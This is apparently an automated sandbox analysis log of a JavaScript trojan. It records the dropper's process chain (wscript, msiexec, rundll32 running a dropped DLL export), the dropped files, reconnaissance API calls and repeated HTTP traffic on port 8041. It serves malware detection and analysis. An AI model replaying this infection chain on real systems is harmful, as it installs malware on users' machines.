                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180032BB86_2_0000000180032BB8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180022BBC6_2_0000000180022BBC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FBD06_2_000000018001FBD0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180042BFC6_2_0000000180042BFC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180031C086_2_0000000180031C08
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DC186_2_000000018001DC18
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EC606_2_000000018001EC60
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CC906_2_000000018001CC90
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180046CAC6_2_0000000180046CAC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FD286_2_000000018001FD28
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001ED686_2_000000018001ED68
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DD706_2_000000018001DD70
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180021D846_2_0000000180021D84
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180024D946_2_0000000180024D94
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180022DA46_2_0000000180022DA4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023DC46_2_0000000180023DC4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002BDDC6_2_000000018002BDDC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CDE86_2_000000018001CDE8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FE306_2_000000018001FE30
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EE706_2_000000018001EE70
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DE746_2_000000018001DE74
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180033E986_2_0000000180033E98
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CEF06_2_000000018001CEF0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180044F386_2_0000000180044F38
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FF386_2_000000018001FF38
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DF786_2_000000018001DF78
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180022F8C6_2_0000000180022F8C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180020FA06_2_0000000180020FA0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023FB06_2_0000000180023FB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180021FB46_2_0000000180021FB4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180024FC46_2_0000000180024FC4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EFC86_2_000000018001EFC8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4B0E31BE6_2_000001FF4B0E31BE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4B0E29EE6_2_000001FF4B0E29EE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000273F807BE6_2_0000000273F807BE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000273F7FFEE6_2_0000000273F7FFEE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE55C06_2_000001FF4CAE55C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD66C06_2_000001FF4CAD66C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAEBED06_2_000001FF4CAEBED0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF82A06_2_000001FF4CAF82A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE16A06_2_000001FF4CAE16A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE42A06_2_000001FF4CAE42A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF66E06_2_000001FF4CAF66E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF72206_2_000001FF4CAF7220
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAFFBC06_2_000001FF4CAFFBC0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF13A36_2_000001FF4CAF13A3
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF2BB06_2_000001FF4CAF2BB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB028126_2_000001FF4CB02812
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAECBE06_2_000001FF4CAECBE0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB01F406_2_000001FF4CB01F40
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CADA7306_2_000001FF4CADA730
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB02F606_2_000001FF4CB02F60
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD95006_2_000001FF4CAD9500
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAEA1006_2_000001FF4CAEA100
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAEB4E06_2_000001FF4CAEB4E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB014906_2_000001FF4CB01490
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD99D06_2_000001FF4CAD99D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE4DB06_2_000001FF4CAE4DB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB002106_2_000001FF4CB00210
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAFB5E06_2_000001FF4CAFB5E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF55E06_2_000001FF4CAF55E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF45506_2_000001FF4CAF4550
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE91206_2_000001FF4CAE9120
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD5D606_2_000001FF4CAD5D60
                  Source: C:\Windows\explorer.exeCode function: 8_2_030521648_2_03052164
                  Source: C:\Windows\explorer.exeCode function: 8_2_03051A7C8_2_03051A7C
                  Source: C:\Windows\explorer.exeCode function: 8_2_03051A8C8_2_03051A8C
                  Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018004816C appears 44 times
                  Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180001400 appears 56 times
                  Source: C:\Windows\Installer\MSIF29D.tmp Code function: String function: 00FD3790 appears 39 times
                  Source: C:\Windows\Installer\MSIF29D.tmp Code function: String function: 00FD325F appears 103 times
                  Source: C:\Windows\Installer\MSIF29D.tmp Code function: String function: 00FD3292 appears 70 times
                  Source: Document-18-33-08.js Initial sample: Strings found which are bigger than 50
                  Source: classification engine Classification label: mal100.spre.troj.evad.winJS@10/21@8/4
                  Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle
                  Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error
                  Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB45B0 LoadResource,LockResource,SizeofResource
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CMLF268.tmp
                  Source: C:\Windows\System32\rundll32.exe Mutant created: NULL
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF93ACB531B807E54B.TMP
                  Source: C:\Windows\Installer\MSIF29D.tmp File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\Installer\MSIF29D.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js"
                  Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4
                  Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\Installer\MSIF29D.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: srpapi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: tsappcmp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: netapi32.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: webio.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: mswsock.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: windows.storage.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: wldp.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: uxtheme.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: propsys.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: apphelp.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: dlnashext.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: wpdshext.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: profapi.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: edputil.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: urlmon.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: iertutil.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: srvcli.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: netutils.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: sspicli.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: wintypes.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: appresolver.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: bcp47langs.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: slc.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: userenv.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: sppc.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\explorer.exe Section loaded: dsrole.dll
                  Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
                  Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp, vierm_soft_x64.dll.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: vierm_soft_x64.dll.1.drStatic PE information: real checksum: 0x81152 should be: 0xbc113
                  Source: vierm_soft_x64.dll.1.drStatic PE information: section name: memcpy_
                  Source: vierm_soft_x64.dll.1.drStatic PE information: section name: _RDATA
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD323C push ecx; ret 4_2_00FD324F
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_000001FF4C9900D8 push cs; retf 6_3_000001FF4C9900FD
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305EF4F push D5912897h; iretq 8_2_0305EF57
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305F5BA push rcx; ret 8_2_0305F5BC
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305EE21 push rsi; ret 8_2_0305EE27

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIF29D.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\vierm_soft_x64.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF29D.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF101.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1BF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1DF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF160.tmpJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49903
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50020
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50021
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50023
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50024
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50026
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50027
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50032
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50037
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50043
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 50052
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000001FF4CAF4D00
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_03058424
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_03057274
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 4125Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 5725Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8824Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 429Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\vierm_soft_x64.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF101.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF1BF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF1DF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF160.tmpJump to dropped file
                  Source: C:\Windows\System32\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-50480
                  Source: C:\Windows\Installer\MSIF29D.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-33659
                  Source: C:\Windows\Installer\MSIF29D.tmpAPI coverage: 6.8 %
                  Source: C:\Windows\System32\msiexec.exe TID: 3452Thread sleep time: -30000s >= -30000sJump to behavior
